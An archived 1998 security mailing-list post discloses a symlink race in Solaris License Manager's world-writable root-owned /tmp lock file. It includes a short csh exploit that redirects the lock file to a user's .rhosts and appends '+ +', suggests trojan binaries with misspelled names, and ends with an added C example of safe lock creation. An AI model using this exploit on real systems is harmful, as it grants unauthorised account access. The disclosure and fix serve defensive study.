Re: License Manager's lockfiles (Solaris 2.5.1)

From: Roger Harrison (rharri01at_private)
Date: Fri Oct 23 1998 - 17:22:03 PDT


    On Wed, 21 Oct 1998, Joel Eriksson wrote:
    
    > License Manager on Solaris 2.5.1 tends to make stupid lockfiles owned by
    > root and mode 666 (world-writable). That is not good, since anyone could
    > create root-owned files which they then would be able to modify. It's an
    > even bigger problem since it just takes about a minute 'til the lockfile
    > is created after it's replaced with a symlink, which it follows ..
    
    I discovered this a few months ago and neglected to post it.
    Solaris 2.6 is affected as well.  A lock file, locksuntechd, is created
    in /tmp with mode 666, owned by root and group root.  I think the program
    causing the problems is lmgrd FLEXlm v2.26d, either that or suntechd.
    
    %ls -la /tmp/locksuntechd
    -rw-rw-rw-  1 root      root        0 Oct 22 12:51 locksuntechd
    
    suntechd is in /opt/SUNWspro/SunTech_License/bin/
    
    There is a log file that contains some stuff about when the daemon is
    going up or down, and also, if users are exploiting it, you can see entries
    about the lock file not being available.  It is in
    /opt/SUNWspro/SunTech_License/license.log
    
    So to exploit it, just remove the locksuntechd file and replace it with a
    symlink to a file you want to create.  It will not overwrite existing
    files, from the testing that I did.  Then the link is followed and the new
    file is created with mode 666, ownership root.  You can then delete the
    symlink and create a new one to somewhere else and it will work again and
    again and again... what fun.  Users could create .rhosts files, new system
    webpages, new trojan binaries with names spelled slightly off that get
    misspelled often (finger-fineger, pine-pien, ls-sl).  Come on... tell me
    you never typed one of those out wrong while you were typing fast!
    
    ------
    #!/bin/csh -f
    # Change target user name before running
    # Iconoclastat_private 10/98
    rm /tmp/locksuntechd
    ln -s ~targetuser/.rhosts /tmp/locksuntechd
    exit
    ------
    Then wait a minute and cat + + >> ~targetuser/.rhosts
    
    that's all for now...
    
    -Iconoclast
    iconoclastat_private
    
    shout-outs to segv and timespace
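As an added example from the defender's side (not part of the original post or of the FLEXlm/suntechd code), this is how a daemon should create its lock file so that a pre-planted symlink cannot redirect it, plus the lstat check an administrator can run over a lock path; the temp directory and file names in the demo are constructed for illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a lock file that a pre-planted symlink cannot redirect: O_EXCL
 * refuses any existing path (symlinks included), O_NOFOLLOW refuses to
 * traverse one, and 0644 keeps other users out. Returns fd or -1. */
int create_lockfile_safely(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
}

/* Check a lock path the way the post found it with ls -la:
 * 0 = sane, 1 = symlink, 2 = world-writable, -1 = does not exist. */
int audit_lockfile(const char *path)
{
    struct stat st;
    if (lstat(path, &st) != 0)   /* lstat: inspect the link itself */
        return -1;
    if (S_ISLNK(st.st_mode))
        return 1;
    if (st.st_mode & S_IWOTH)
        return 2;
    return 0;
}

/* Demo in a private temp dir (constructed paths, not the real /tmp lock):
 * plant a symlink where the lock goes, show the safe create refuses it and
 * leaves the link target uncreated, then succeed once the link is gone.
 * Returns 0 if every step behaved, otherwise the number of the failing step. */
int run_demo(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX", lock[256], target[256];
    int fd, rc = 0;
    if (mkdtemp(dir) == NULL) return 1;
    snprintf(lock, sizeof lock, "%s/locksuntechd", dir);
    snprintf(target, sizeof target, "%s/victim.rhosts", dir);
    if (symlink(target, lock) != 0) rc = 2;
    else if (audit_lockfile(lock) != 1) rc = 3;
    else if (create_lockfile_safely(lock) != -1) rc = 4;  /* must refuse */
    else if (access(target, F_OK) == 0) rc = 5;           /* nothing created */
    else if (unlink(lock) != 0) rc = 6;
    else if ((fd = create_lockfile_safely(lock)) < 0) rc = 7;
    else { close(fd); if (audit_lockfile(lock) != 0) rc = 8; }
    unlink(lock); unlink(target); rmdir(dir);
    return rc;
}
```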
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:20:57 PDT